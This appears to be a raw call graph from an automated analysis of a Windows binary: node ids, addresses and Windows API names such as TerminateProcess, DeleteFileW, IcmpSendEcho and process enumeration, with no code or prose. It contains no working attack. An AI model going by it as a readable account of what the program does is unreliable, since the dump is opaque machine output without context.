96945->96943 96945->96944 96946 510568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96945->96946 96947 546115 96945->96947 96949 500aae ISource 96945->96949 96972 501990 96945->96972 97034 501e50 96945->97034 96946->96945 97044 563fe1 81 API calls __wsopen_s 96947->97044 97045 563fe1 81 API calls __wsopen_s 96949->97045 96951 4fbe38 96950->96951 96952 4fbe67 96951->96952 97804 4fbfa5 39 API calls 96951->97804 96952->96906 96954->96906 96955->96906 96956->96906 96958 51014b 8 API calls 96957->96958 96959 50bc65 96958->96959 96960 4fb329 8 API calls 96959->96960 96961 50bc70 96960->96961 96961->96906 96962->96906 96963->96906 96964->96906 96965->96906 96966->96905 96967->96923 96968->96906 96969->96906 96970->96923 96971->96909 96973 5019b6 96972->96973 96974 501a2e 96972->96974 96976 5019c3 96973->96976 96977 546b60 96973->96977 96975 546a4d 96974->96975 96993 501a3d 96974->96993 96979 546b54 96975->96979 96980 546a58 96975->96980 96986 546b84 96976->96986 96987 5019cd 96976->96987 97054 5785db 207 API calls 2 library calls 96977->97054 97053 563fe1 81 API calls __wsopen_s 96979->97053 97052 50b35c 207 API calls 96980->97052 96981 500340 207 API calls 96981->96993 96984 546bb5 96988 546bc0 96984->96988 96989 546be2 96984->96989 96985 501b62 ISource 97004 501a23 ISource 96985->97004 97009 4fbed9 8 API calls 96985->97009 97010 5019e0 ISource 96985->97010 96986->96984 96992 546b9c 96986->96992 96991 4fbed9 8 API calls 96987->96991 96987->97010 97056 5785db 207 API calls 2 library calls 96988->97056 97057 5760e6 96989->97057 96990 501bb5 96990->96945 96991->97010 97055 563fe1 81 API calls __wsopen_s 96992->97055 96993->96981 96993->96990 96994 546979 96993->96994 97001 546908 96993->97001 96993->97010 97014 501ba9 96993->97014 97022 501af4 96993->97022 97051 563fe1 81 API calls __wsopen_s 96994->97051 96999 546dd9 97003 546e0f 96999->97003 97133 5781ce 65 API calls 96999->97133 97050 563fe1 81 API calls __wsopen_s 97001->97050 97008 4fb4c8 8 API calls 97003->97008 97004->96945 97006 546c81 97130 561ad8 8 API calls 97006->97130 97008->97004 97009->97010 97010->96999 97010->97004 97132 57808f 53 API calls __wsopen_s 97010->97132 97011 546db7 97015 4f8ec0 52 API calls 97011->97015 97012 546ded 97017 4f8ec0 52 API calls 97012->97017 97013 54691d ISource 97013->96985 97013->96994 97013->97004 97014->96990 97049 563fe1 81 API calls __wsopen_s 97014->97049 97020 546dbf _wcslen 97015->97020 97016 546c08 97064 56148b 97016->97064 97028 546df5 _wcslen 97017->97028 97020->96999 97030 4fb4c8 8 API calls 97020->97030 97021 546c93 97131 4fbd07 8 API calls 97021->97131 97022->97014 97048 501ca0 8 API calls 97022->97048 97026 501b55 97026->96985 97026->97014 97028->97003 97032 4fb4c8 8 API calls 97028->97032 97029 546c9c 97033 56148b 8 API calls 97029->97033 97030->96999 97032->97003 97033->97010 97037 501e6d ISource 97034->97037 97035 502512 97038 501ff7 ISource 97035->97038 97803 50be08 39 API calls 97035->97803 97037->97035 97037->97038 97040 547837 97037->97040 97043 54766b 97037->97043 97801 50e322 8 API calls ISource 97037->97801 97038->96945 97040->97038 97802 51d2d5 39 API calls 97040->97802 97800 51d2d5 39 API calls 97043->97800 97044->96949 97045->96944 97046->96944 97047->96944 97048->97026 97049->97004 97050->97013 97051->97010 97052->96985 97053->96977 97054->97010 97055->97004 97056->97010 97058 546bed 97057->97058 97059 576101 97057->97059 97058->97006 97058->97016 97060 51017b 8 API calls 97059->97060 97062 576123 97060->97062 97061 51014b 8 API calls 97061->97062 97062->97058 97062->97061 97134 561400 8 API calls 97062->97134 97065 561499 97064->97065 97067 546c32 97064->97067 97066 51014b 8 API calls 97065->97066 97065->97067 97066->97067 97068 502b20 97067->97068 97069 502fc0 97068->97069 97070 502b86 97068->97070 97280 5105b2 5 API calls __Init_thread_wait 97069->97280 97072 502ba0 97070->97072 97073 547bd8 97070->97073 97135 503160 97072->97135 97243 577af9 97073->97243 97075 502fca 97079 4fb329 8 API calls 97075->97079 97083 50300b 97075->97083 97077 547be4 97077->97010 97088 502fe4 97079->97088 97080 503160 9 API calls 97081 502bc6 97080->97081 97081->97083 97084 502bfc 97081->97084 97082 547bed 97082->97010 97083->97082 97086 4fb4c8 8 API calls 97083->97086 97085 547bfd 97084->97085 97108 502c18 __fread_nolock 97084->97108 97284 563fe1 81 API calls __wsopen_s 97085->97284 97090 503049 97086->97090 97281 510568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97088->97281 97282 50e6e8 207 API calls 97090->97282 97091 547c15 97285 563fe1 81 API calls __wsopen_s 97091->97285 97093 502d3f 97095 547c78 97093->97095 97096 502d4c 97093->97096 97287 5761a2 53 API calls _wcslen 97095->97287 97097 503160 9 API calls 97096->97097 97099 502d59 97097->97099 97102 547da1 97099->97102 97104 503160 9 API calls 97099->97104 97100 51014b 8 API calls 97100->97108 97101 51017b 8 API calls 97101->97108 97112 547c10 97102->97112 97288 563fe1 81 API calls __wsopen_s 97102->97288 97103 503082 97283 50fe39 8 API calls 97103->97283 97110 502d73 97104->97110 97107 500340 207 API calls 97107->97108 97108->97090 97108->97091 97108->97093 97108->97100 97108->97101 97108->97107 97109 547c59 97108->97109 97108->97112 97286 563fe1 81 API calls __wsopen_s 97109->97286 97110->97102 97113 4fbed9 8 API calls 97110->97113 97115 502dd7 ISource 97110->97115 97112->97010 97113->97115 97114 503160 9 API calls 97114->97115 97115->97102 97115->97103 97115->97112 97115->97114 97118 502e8b ISource 97115->97118 97145 57ad47 97115->97145 97150 57a5b2 97115->97150 97156 56df45 97115->97156 97161 57a9ac 97115->97161 97169 56664c 97115->97169 97176 56f94a 97115->97176 97185 579ffc 97115->97185 97188 50ac3e 97115->97188 97207 57a6aa 97115->97207 97215 579fe8 97115->97215 97218 570fb8 97115->97218 97116 502f2d 97116->97010 97118->97116 97279 50e322 8 API calls ISource 97118->97279 97130->97021 97131->97029 97132->97011 97133->97012 97134->97062 97136 5031a1 97135->97136 97137 50317d 97135->97137 97289 5105b2 5 API calls __Init_thread_wait 97136->97289 97144 502bb0 97137->97144 97291 5105b2 5 API calls __Init_thread_wait 97137->97291 97139 5031ab 97139->97137 97290 510568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97139->97290 97141 509f47 97141->97144 97292 510568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97141->97292 97144->97080 97146 4f8ec0 52 API calls 97145->97146 97147 57ad63 97146->97147 97293 55dd87 CreateToolhelp32Snapshot Process32FirstW 97147->97293 97149 57ad72 97149->97115 97153 57a5c5 97150->97153 97151 4f8ec0 52 API calls 97152 57a632 97151->97152 97405 5618a9 97152->97405 97153->97151 97155 57a5d4 97153->97155 97155->97115 97157 4fb4c8 8 API calls 97156->97157 97158 56df58 97157->97158 97446 561926 97158->97446 97160 56df60 97160->97115 97163 57aa08 97161->97163 97168 57a9c8 97161->97168 97162 57aa26 97166 57aa8e 97162->97166 97162->97168 97509 4fc98d 39 API calls 97162->97509 97163->97162 97508 4fc98d 39 API calls 97163->97508 97476 560372 97166->97476 97168->97115 97170 4f8ec0 52 API calls 97169->97170 97171 566662 97170->97171 97550 55dc54 97171->97550 97173 56666a 97174 566683 97173->97174 97175 56666e GetLastError 97173->97175 97174->97115 97175->97174 97177 51017b 8 API calls 97176->97177 97178 56f95b 97177->97178 97611 4f423c 97178->97611 97181 4f8ec0 52 API calls 97182 56f97c GetEnvironmentVariableW 97181->97182 97614 56160f 8 API calls 97182->97614 97184 56f999 ISource 97184->97115 97615 5789b6 97185->97615 97187 57a00c 97187->97115 97189 4f8ec0 52 API calls 97188->97189 97190 50ac68 97189->97190 97191 50bc58 8 API calls 97190->97191 97192 50ac7f 97191->97192 97203 50b09b _wcslen 97192->97203 97741 4fc98d 39 API calls 97192->97741 97194 514d98 _strftime 40 API calls 97194->97203 97196 4f6c03 8 API calls 97196->97203 97199 50bbbe 43 API calls 97199->97203 97200 50b1fb 97200->97115 97201 4fc98d 39 API calls 97201->97203 97202 4f8ec0 52 API calls 97202->97203 97203->97194 97203->97196 97203->97199 97203->97200 97203->97201 97203->97202 97204 4f8577 8 API calls 97203->97204 97727 4f396b 97203->97727 97737 4f3907 97203->97737 97742 4f7ad5 97203->97742 97747 4fad40 8 API calls __fread_nolock 97203->97747 97748 4f7b1a 8 API calls 97203->97748 97204->97203 97208 57a6c5 97207->97208 97210 57a705 97207->97210 97208->97115 97209 57a723 97209->97208 97213 57a780 97209->97213 97787 4fc98d 39 API calls 97209->97787 97210->97209 97786 4fc98d 39 API calls 97210->97786 97214 560372 58 API calls 97213->97214 97214->97208 97216 5789b6 119 API calls 97215->97216 97217 579ff8 97216->97217 97217->97115 97219 570fe1 97218->97219 97220 57100f WSAStartup 97219->97220 97793 4fc98d 39 API calls 97219->97793 97222 571054 97220->97222 97242 571023 ISource 97220->97242 97788 50c1f6 97222->97788 97224 570ffc 97224->97220 97794 4fc98d 39 API calls 97224->97794 97226 4f8ec0 52 API calls 97228 571069 97226->97228 97230 50f9d4 10 API calls 97228->97230 97229 57100b 97229->97220 97231 571075 inet_addr gethostbyname 97230->97231 97232 571093 IcmpCreateFile 97231->97232 97231->97242 97233 5710d3 97232->97233 97232->97242 97234 51017b 8 API calls 97233->97234 97235 5710ec 97234->97235 97236 4f423c 8 API calls 97235->97236 97237 5710f7 97236->97237 97238 571102 IcmpSendEcho 97237->97238 97239 57112b IcmpSendEcho 97237->97239 97240 57114c 97238->97240 97239->97240 97241 571212 IcmpCloseHandle WSACleanup 97240->97241 97241->97242 97242->97115 97244 577b52 97243->97244 97245 577b38 97243->97245 97247 5760e6 8 API calls 97244->97247 97795 563fe1 81 API calls __wsopen_s 97245->97795 97248 577b5d 97247->97248 97249 500340 206 API calls 97248->97249 97250 577bc1 97249->97250 97251 577c5c 97250->97251 97254 577c03 97250->97254 97274 577b4a 97250->97274 97252 577c62 97251->97252 97253 577cb0 97251->97253 97796 561ad8 8 API calls 97252->97796 97255 4f8ec0 52 API calls 97253->97255 97253->97274 97258 56148b 8 API calls 97254->97258 97256 577cc2 97255->97256 97259 4fc2c9 8 API calls 97256->97259 97261 577c3b 97258->97261 97262 577ce6 CharUpperBuffW 97259->97262 97260 577c85 97797 4fbd07 8 API calls 97260->97797 97264 502b20 206 API calls 97261->97264 97265 577d00 97262->97265 97264->97274 97266 577d07 97265->97266 97267 577d53 97265->97267 97270 56148b 8 API calls 97266->97270 97268 4f8ec0 52 API calls 97267->97268 97269 577d5b 97268->97269 97798 50aa65 9 API calls 97269->97798 97272 577d35 97270->97272 97273 502b20 206 API calls 97272->97273 97273->97274 97274->97077 97275 577d65 97275->97274 97276 4f8ec0 52 API calls 97275->97276 97277 577d80 97276->97277 97799 4fbd07 8 API calls 97277->97799 97279->97118 97280->97075 97281->97083 97282->97103 97283->97103 97284->97112 97285->97112 97286->97112 97287->97110 97288->97112 97289->97139 97290->97137 97291->97141 97292->97144 97303 55e80e 97293->97303 97295 55ddd4 Process32NextW 97296 55de86 CloseHandle 97295->97296 97297 55ddcd 97295->97297 97296->97149 97297->97295 97297->97296 97298 4fbf73 8 API calls 97297->97298 97299 4fb329 8 API calls 97297->97299 97301 4f7bb5 8 API calls 97297->97301 97309 4f568e 97297->97309 97351 50e36b 41 API calls 97297->97351 97298->97297 97299->97297 97301->97297 97307 55e819 97303->97307 97304 55e830 97353 51666b 39 API calls _strftime 97304->97353 97307->97304 97308 55e836 97307->97308 97352 516722 GetStringTypeW _strftime 97307->97352 97308->97297 97354 4fbf73 97309->97354 97312 4fbf73 8 API calls 97313 4f56ac 97312->97313 97314 4fbf73 8 API calls 97313->97314 97315 4f56b4 97314->97315 97316 4fbf73 8 API calls 97315->97316 97317 4f56bc 97316->97317 97318 534da1 97317->97318 97319 4f56f0 97317->97319 97320 4fbed9 8 API calls 97318->97320 97321 4facc0 8 API calls 97319->97321 97322 534daa 97320->97322 97323 4f56fe 97321->97323 97378 4fbd57 97322->97378 97371 4fadf4 97323->97371 97326 4f5708 97328 4f5733 97326->97328 97329 4facc0 8 API calls 97326->97329 97327 4f5778 97359 4facc0 97327->97359 97328->97327 97330 4f5754 97328->97330 97346 534dcc 97328->97346 97332 4f5729 97329->97332 97330->97327 97375 4f655e 97330->97375 97334 4fadf4 8 API calls 97332->97334 97333 4f5789 97336 4f579f 97333->97336 97341 4fbed9 8 API calls 97333->97341 97334->97328 97337 4f57b3 97336->97337 97342 4fbed9 8 API calls 97336->97342 97340 4f57be 97337->97340 97344 4fbed9 8 API calls 97337->97344 97345 4fbed9 8 API calls 97340->97345 97350 4f57c9 97340->97350 97341->97336 97342->97337 97343 4facc0 8 API calls 97343->97327 97344->97340 97345->97350 97384 4f8577 97346->97384 97347 4f655e 8 API calls 97348 534e8c 97347->97348 97348->97327 97348->97347 97396 4fad40 8 API calls __fread_nolock 97348->97396 97350->97297 97351->97297 97352->97307 97353->97308 97355 51017b 8 API calls 97354->97355 97356 4fbf88 97355->97356 97357 51014b 8 API calls 97356->97357 97358 4f56a4 97357->97358 97358->97312 97361 4face1 97359->97361 97370 4faccf 97359->97370 97363 540557 97361->97363 97364 4fad07 97361->97364 97361->97370 97362 5405a3 __fread_nolock 97366 51014b 8 API calls 97363->97366 97397 4f88e8 8 API calls 97364->97397 97367 540561 97366->97367 97369 51017b 8 API calls 97367->97369 97368 4facda __fread_nolock 97368->97333 97369->97370 97370->97368 97398 4fc2c9 97370->97398 97372 4fae0b __fread_nolock 97371->97372 97373 4fae02 97371->97373 97372->97326 97372->97372 97373->97372 97374 4fc2c9 8 API calls 97373->97374 97374->97372 97376 4fc2c9 8 API calls 97375->97376 97377 4f5761 97376->97377 97377->97327 97377->97343 97379 4fbd64 97378->97379 97380 4fbd71 97378->97380 97379->97328 97381 51014b 8 API calls 97380->97381 97382 4fbd7b 97381->97382 97383 51017b 8 API calls 97382->97383 97383->97379 97385 536610 97384->97385 97386 4f8587 _wcslen 97384->97386 97387 4fadf4 8 API calls 97385->97387 97389 4f859d 97386->97389 97390 4f85c2 97386->97390 97388 536619 97387->97388 97388->97388 97404 4f88e8 8 API calls 97389->97404 97392 51014b 8 API calls 97390->97392 97394 4f85ce 97392->97394 97393 4f85a5 __fread_nolock 97393->97348 97395 51017b 8 API calls 97394->97395 97395->97393 97396->97348 97397->97368 97399 4fc2dc 97398->97399 97403 4fc2d9 __fread_nolock 97398->97403 97400 51014b 8 API calls 97399->97400 97401 4fc2e7 97400->97401 97402 51017b 8 API calls 97401->97402 97402->97403 97403->97362 97404->97393 97406 5618b6 97405->97406 97407 51014b 8 API calls 97406->97407 97408 5618bd 97407->97408 97411 55fcb5 97408->97411 97410 5618f7 97410->97155 97412 4fc2c9 8 API calls 97411->97412 97413 55fcc8 CharLowerBuffW 97412->97413 97418 55fcdb 97413->97418 97414 4f655e 8 API calls 97414->97418 97415 55fce5 ___scrt_fastfail 97415->97410 97416 55fd19 97419 4f655e 8 API calls 97416->97419 97420 55fd2b 97416->97420 97417 51017b 8 API calls 97421 55fd59 97417->97421 97418->97414 97418->97415 97418->97416 97419->97420 97420->97417 97425 55fd7b 97421->97425 97444 55fbed 8 API calls 97421->97444 97424 55fdb8 97424->97415 97426 51014b 8 API calls 97424->97426 97429 55fe0c 97425->97429 97427 55fdd2 97426->97427 97428 51017b 8 API calls 97427->97428 97428->97415 97430 4fbf73 8 API calls 97429->97430 97431 55fe3e 97430->97431 97432 4fbf73 8 API calls 97431->97432 97433 55fe47 97432->97433 97434 4fbf73 8 API calls 97433->97434 97440 55fe50 97434->97440 97435 560114 97435->97424 97436 4fad40 8 API calls 97436->97440 97437 4f8577 8 API calls 97437->97440 97438 5166f8 GetStringTypeW 97438->97440 97440->97435 97440->97436 97440->97437 97440->97438 97441 516641 39 API calls 97440->97441 97442 55fe0c 40 API calls 97440->97442 97443 4fbed9 8 API calls 97440->97443 97445 516722 GetStringTypeW _strftime 97440->97445 97441->97440 97442->97440 97443->97440 97444->97421 97445->97440 97447 56193d 97446->97447 97460 561a56 97446->97460 97448 5619a1 97447->97448 97449 56195d 97447->97449 97451 56198a 97447->97451 97454 51017b 8 API calls 97448->97454 97462 5619be 97448->97462 97449->97451 97453 561971 97449->97453 97450 51017b 8 API calls 97464 56197f __fread_nolock 97450->97464 97451->97450 97452 5619e5 97456 51017b 8 API calls 97452->97456 97455 51017b 8 API calls 97453->97455 97454->97462 97455->97464 97457 5619eb 97456->97457 97465 50c277 8 API calls 97457->97465 97458 51014b 8 API calls 97458->97460 97460->97160 97461 5619f7 97466 50f9d4 WideCharToMultiByte 97461->97466 97462->97452 97462->97453 97462->97464 97464->97458 97465->97461 97467 50fa35 97466->97467 97468 50f9fe 97466->97468 97475 50fe8a 8 API calls 97467->97475 97469 51017b 8 API calls 97468->97469 97471 50fa05 WideCharToMultiByte 97469->97471 97474 50fa3e 8 API calls __fread_nolock 97471->97474 97473 50fa29 97473->97464 97474->97473 97475->97473 97510 5602aa 97476->97510 97479 5603f3 97526 5605e9 56 API calls __fread_nolock 97479->97526 97480 56040b 97482 560471 97480->97482 97485 56041b 97480->97485 97483 560507 97482->97483 97484 5604a1 97482->97484 97490 560399 __fread_nolock 97482->97490 97488 5605b0 97483->97488 97489 560510 97483->97489 97486 5604a6 97484->97486 97487 5604d1 97484->97487 97507 560453 97485->97507 97527 562855 10 API calls 97485->97527 97486->97490 97530 4fca5b 39 API calls 97486->97530 97487->97490 97531 4fca5b 39 API calls 97487->97531 97488->97490 97535 4fc63f 39 API calls 97488->97535 97491 560515 97489->97491 97492 56058d 97489->97492 97490->97168 97498 56051b 97491->97498 97499 560554 97491->97499 97492->97490 97534 4fc63f 39 API calls 97492->97534 97498->97490 97532 4fc63f 39 API calls 97498->97532 97499->97490 97533 4fc63f 39 API calls 97499->97533 97501 560427 97528 562855 10 API calls 97501->97528 97505 56043e __fread_nolock 97529 562855 10 API calls 97505->97529 97517 561844 97507->97517 97508->97162 97509->97166 97511 5602f7 97510->97511 97515 5602bb 97510->97515 97546 4fc98d 39 API calls 97511->97546 97513 5602f5 97513->97479 97513->97480 97513->97490 97514 4f8ec0 52 API calls 97514->97515 97515->97513 97515->97514 97536 514d98 97515->97536 97518 56184f 97517->97518 97519 51014b 8 API calls 97518->97519 97520 561856 97519->97520 97521 561862 97520->97521 97522 561883 97520->97522 97523 51017b 8 API calls 97521->97523 97524 51017b 8 API calls 97522->97524 97525 56186b ___scrt_fastfail 97523->97525 97524->97525 97525->97490 97526->97490 97527->97501 97528->97505 97529->97507 97530->97490 97531->97490 97532->97490 97533->97490 97534->97490 97535->97490 97537 514e1b 97536->97537 97538 514da6 97536->97538 97549 514e2d 40 API calls 4 library calls 97537->97549 97545 514dcb 97538->97545 97547 51f649 20 API calls _abort 97538->97547 97541 514e28 97541->97515 97542 514db2 97548 522b5c 26 API calls _abort 97542->97548 97544 514dbd 97544->97515 97545->97515 97546->97513 97547->97542 97548->97544 97549->97541 97551 4fbf73 8 API calls 97550->97551 97552 55dc73 97551->97552 97553 4fbf73 8 API calls 97552->97553 97554 55dc7c 97553->97554 97555 4fbf73 8 API calls 97554->97555 97556 55dc85 97555->97556 97574 4f5851 97556->97574 97561 55dcab 97563 4f568e 8 API calls 97561->97563 97562 4f6b7c 8 API calls 97562->97561 97564 55dcbf FindFirstFileW 97563->97564 97565 55dd4b FindClose 97564->97565 97568 55dcde 97564->97568 97570 55dd56 97565->97570 97566 55dd26 FindNextFileW 97566->97568 97567 4fbed9 8 API calls 97567->97568 97568->97565 97568->97566 97568->97567 97569 4f7bb5 8 API calls 97568->97569 97586 4f6b7c 97568->97586 97569->97568 97570->97173 97573 55dd42 FindClose 97573->97570 97595 5322d0 97574->97595 97577 4f587d 97579 4f8577 8 API calls 97577->97579 97578 4f5898 97580 4fbd57 8 API calls 97578->97580 97581 4f5889 97579->97581 97580->97581 97597 4f55dc 97581->97597 97584 55eab0 GetFileAttributesW 97585 55dc99 97584->97585 97585->97561 97585->97562 97587 4f6b93 97586->97587 97588 5357fe 97586->97588 97601 4f6ba4 97587->97601 97590 51014b 8 API calls 97588->97590 97592 535808 _wcslen 97590->97592 97591 4f6b9e DeleteFileW 97591->97566 97591->97573 97593 51017b 8 API calls 97592->97593 97594 535841 __fread_nolock 97593->97594 97596 4f585e GetFullPathNameW 97595->97596 97596->97577 97596->97578 97598 4f55ea 97597->97598 97599 4fadf4 8 API calls 97598->97599 97600 4f55fe 97599->97600 97600->97584 97602 4f6bb4 _wcslen 97601->97602 97603 535860 97602->97603 97604 4f6bc7 97602->97604 97605 51014b 8 API calls 97603->97605 97606 4f7d74 8 API calls 97604->97606 97607 53586a 97605->97607 97608 4f6bd4 __fread_nolock 97606->97608 97609 51017b 8 API calls 97607->97609 97608->97591 97610 53589a __fread_nolock 97609->97610 97612 51014b 8 API calls 97611->97612 97613 4f424e 97612->97613 97613->97181 97614->97184 97616 4f8ec0 52 API calls 97615->97616 97617 5789ed 97616->97617 97622 578a32 ISource 97617->97622 97653 579730 97617->97653 97619 578aa6 97619->97622 97627 4f8ec0 52 API calls 97619->97627 97640 578cde 97619->97640 97685 554ad3 8 API calls __fread_nolock 97619->97685 97686 578f7a 41 API calls _strftime 97619->97686 97620 578eac 97702 579941 59 API calls 97620->97702 97621 578cec 97666 5788e3 97621->97666 97622->97187 97625 578ebb 97625->97621 97626 578ec7 97625->97626 97626->97622 97627->97619 97632 578d25 97680 50ffe0 97632->97680 97635 578d45 97687 563fe1 81 API calls __wsopen_s 97635->97687 97636 578d5f 97688 4f7e12 97636->97688 97639 578d50 GetCurrentProcess TerminateProcess 97639->97636 97640->97620 97640->97621 97645 578f22 97645->97622 97648 578f36 FreeLibrary 97645->97648 97646 578d9e 97700 5795d8 74 API calls 97646->97700 97648->97622 97651 4fb4c8 8 API calls 97652 578daf 97651->97652 97652->97645 97652->97651 97701 501ca0 8 API calls 97652->97701 97703 5795d8 74 API calls 97652->97703 97654 4fc2c9 8 API calls 97653->97654 97655 57974b CharLowerBuffW 97654->97655 97704 559805 97655->97704 97659 4fbf73 8 API calls 97660 579787 97659->97660 97661 4facc0 8 API calls 97660->97661 97662 57979b 97661->97662 97663 4fadf4 8 API calls 97662->97663 97665 5797a5 _wcslen 97663->97665 97664 5798bb _wcslen 97664->97619 97665->97664 97711 578f7a 41 API calls _strftime 97665->97711 97667 5788fe 97666->97667 97668 578949 97666->97668 97669 51017b 8 API calls 97667->97669 97672 579af3 97668->97672 97670 578920 97669->97670 97670->97668 97671 51014b 8 API calls 97670->97671 97671->97670 97673 579d08 ISource 97672->97673 97678 579b17 _strcat _wcslen ___std_exception_copy 97672->97678 97673->97632 97674 4fc98d 39 API calls 97674->97678 97675 4fca5b 39 API calls 97675->97678 97676 4fc63f 39 API calls 97676->97678 97677 4f8ec0 52 API calls 97677->97678 97678->97673 97678->97674 97678->97675 97678->97676 97678->97677 97714 55f8c5 10 API calls _wcslen 97678->97714 97681 50fff5 97680->97681 97682 51008d SetErrorMode 97681->97682 97683 51005b 97681->97683 97684 51007b CloseHandle 97681->97684 97682->97683 97683->97635 97683->97636 97684->97683 97685->97619 97686->97619 97687->97639 97689 4f7e1a 97688->97689 97690 51014b 8 API calls 97689->97690 97691 4f7e28 97690->97691 97715 4f8445 97691->97715 97694 4f8470 97718 4fc760 97694->97718 97696 4f8480 97697 51017b 8 API calls 97696->97697 97698 4f851c 97696->97698 97697->97698 97698->97652 97699 501ca0 8 API calls 97698->97699 97699->97646 97700->97652 97701->97652 97702->97625 97703->97652 97706 559825 _wcslen 97704->97706 97705 559914 97705->97659 97705->97665 97706->97705 97707 559919 97706->97707 97708 55985a 97706->97708 97707->97705 97713 50e36b 41 API calls 97707->97713 97708->97705 97712 50e36b 41 API calls 97708->97712 97711->97664 97712->97708 97713->97707 97714->97678 97716 51014b 8 API calls 97715->97716 97717 4f7e30 97716->97717 97717->97694 97719 4fc76b 97718->97719 97720 541285 97719->97720 97724 4fc773 ISource 97719->97724 97722 51014b 8 API calls 97720->97722 97721 4fc77a 97721->97696 97723 541291 97722->97723 97724->97721 97726 4fc7e0 8 API calls ISource 97724->97726 97726->97724 97728 4f3996 ___scrt_fastfail 97727->97728 97749 4f5f32 97728->97749 97731 4f3a1c 97733 4f3a3a Shell_NotifyIconW 97731->97733 97734 5340cd Shell_NotifyIconW 97731->97734 97753 4f61a9 97733->97753 97736 4f3a50 97736->97203 97738 4f3969 97737->97738 97739 4f3919 ___scrt_fastfail 97737->97739 97738->97203 97740 4f3938 Shell_NotifyIconW 97739->97740 97740->97738 97741->97203 97743 51017b 8 API calls 97742->97743 97744 4f7afa 97743->97744 97745 51014b 8 API calls 97744->97745 97746 4f7b08 97745->97746 97746->97203 97747->97203 97748->97203 97750 4f5f4e 97749->97750 97751 4f39eb 97749->97751 97750->97751 97752 535070 DestroyIcon 97750->97752 97751->97731 97783 55d11f 42 API calls _strftime 97751->97783 97752->97751 97754 4f61c6 97753->97754 97773 4f62a8 97753->97773 97755 4f7ad5 8 API calls 97754->97755 97756 4f61d4 97755->97756 97757 535278 LoadStringW 97756->97757 97758 4f61e1 97756->97758 97761 535292 97757->97761 97759 4f8577 8 API calls 97758->97759 97760 4f61f6 97759->97760 97762 4f6203 97760->97762 97768 5352ae 97760->97768 97764 4fbed9 8 API calls 97761->97764 97769 4f6229 ___scrt_fastfail 97761->97769 97762->97761 97763 4f620d 97762->97763 97765 4f6b7c 8 API calls 97763->97765 97764->97769 97766 4f621b 97765->97766 97767 4f7bb5 8 API calls 97766->97767 97767->97769 97768->97769 97770 5352f1 97768->97770 97772 4fbf73 8 API calls 97768->97772 97771 4f628e Shell_NotifyIconW 97769->97771 97785 50fe6f 51 API calls 97770->97785 97771->97773 97774 5352d8 97772->97774 97773->97736 97784 55a350 9 API calls 97774->97784 97777 5352e3 97779 4f7bb5 8 API calls 97777->97779 97778 535310 97780 4f6b7c 8 API calls 97778->97780 97779->97770 97781 535321 97780->97781 97782 4f6b7c 8 API calls 97781->97782 97782->97769 97783->97731 97784->97777 97785->97778 97786->97209 97787->97213 97789 51017b 8 API calls 97788->97789 97790 50c209 97789->97790 97791 51014b 8 API calls 97790->97791 97792 50c215 97791->97792 97792->97226 97793->97224 97794->97229 97795->97274 97796->97260 97797->97274 97798->97275 97799->97274 97800->97043 97801->97037 97802->97038 97803->97038 97804->96952 97805 4f1044 97810 4f2793 97805->97810 97807 4f104a 97846 510413 29 API calls __onexit 97807->97846 97809 4f1054 97847 4f2a38 97810->97847 97814 4f280a 97815 4fbf73 8 API calls 97814->97815 97816 4f2814 97815->97816 97817 4fbf73 8 API calls 97816->97817 97818 4f281e 97817->97818 97819 4fbf73 8 API calls 97818->97819 97820 4f2828 97819->97820 97821 4fbf73 8 API calls 97820->97821 97822 4f2866 97821->97822 97823 4fbf73 8 API calls 97822->97823 97824 4f2932 97823->97824 97857 4f2dbc 97824->97857 97828 4f2964 97829 4fbf73 8 API calls 97828->97829 97830 4f296e 97829->97830 97831 503160 9 API calls 97830->97831 97832 4f2999 97831->97832 97884 4f3166 97832->97884 97834 4f29b5 97835 4f29c5 GetStdHandle 97834->97835 97836 5339e7 97835->97836 97837 4f2a1a 97835->97837 97836->97837 97838 5339f0 97836->97838 97840 4f2a27 OleInitialize 97837->97840 97839 51014b 8 API calls 97838->97839 97841 5339f7 97839->97841 97840->97807 97891 560ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97841->97891 97843 533a00 97892 5612eb CreateThread 97843->97892 97845 533a0c CloseHandle 97845->97837 97846->97809 97893 4f2a91 97847->97893 97850 4f2a91 8 API calls 97851 4f2a70 97850->97851 97852 4fbf73 8 API calls 97851->97852 97853 4f2a7c 97852->97853 97854 4f8577 8 API calls 97853->97854 97855 4f27c9 97854->97855 97856 4f327e 6 API calls 97855->97856 97856->97814 97858 4fbf73 8 API calls 97857->97858 97859 4f2dcc 97858->97859 97860 4fbf73 8 API calls 97859->97860 97861 4f2dd4 97860->97861 97900 4f81d6 97861->97900 97864 4f81d6 8 API calls 97865 4f2de4 97864->97865 97866 4fbf73 8 API calls 97865->97866 97867 4f2def 97866->97867 97868 51014b 8 API calls 97867->97868 97869 4f293c 97868->97869 97870 4f3205 97869->97870 97871 4f3213 97870->97871 97872 4fbf73 8 API calls 97871->97872 97873 4f321e 97872->97873 97874 4fbf73 8 API calls 97873->97874 97875 4f3229 97874->97875 97876 4fbf73 8 API calls 97875->97876 97877 4f3234 97876->97877 97878 4fbf73 8 API calls 97877->97878 97879 4f323f 97878->97879 97880 4f81d6 8 API calls 97879->97880 97881 4f324a 97880->97881 97882 51014b 8 API calls 97881->97882 97883 4f3251 RegisterWindowMessageW 97882->97883 97883->97828 97885 4f3176 97884->97885 97886 533c8f 97884->97886 97887 51014b 8 API calls 97885->97887 97903 563c4e 8 API calls 97886->97903 97890 4f317e 97887->97890 97889 533c9a 97890->97834 97891->97843 97892->97845 97904 5612d1 14 API calls 97892->97904 97894 4fbf73 8 API calls 97893->97894 97895 4f2a9c 97894->97895 97896 4fbf73 8 API calls 97895->97896 97897 4f2aa4 97896->97897 97898 4fbf73 8 API calls 97897->97898 97899 4f2a66 97898->97899 97899->97850 97901 4fbf73 8 API calls 97900->97901 97902 4f2ddc 97901->97902 97902->97864 97903->97889 97905 50235c 97914 502365 __fread_nolock 97905->97914 97906 4f8ec0 52 API calls 97906->97914 97907 5474e3 97917 5513c8 8 API calls __fread_nolock 97907->97917 97909 5474ef 97913 4fbed9 8 API calls 97909->97913 97915 501ff7 __fread_nolock 97909->97915 97910 5023b6 97912 4f7d74 8 API calls 97910->97912 97911 51014b 8 API calls 97911->97914 97912->97915 97913->97915 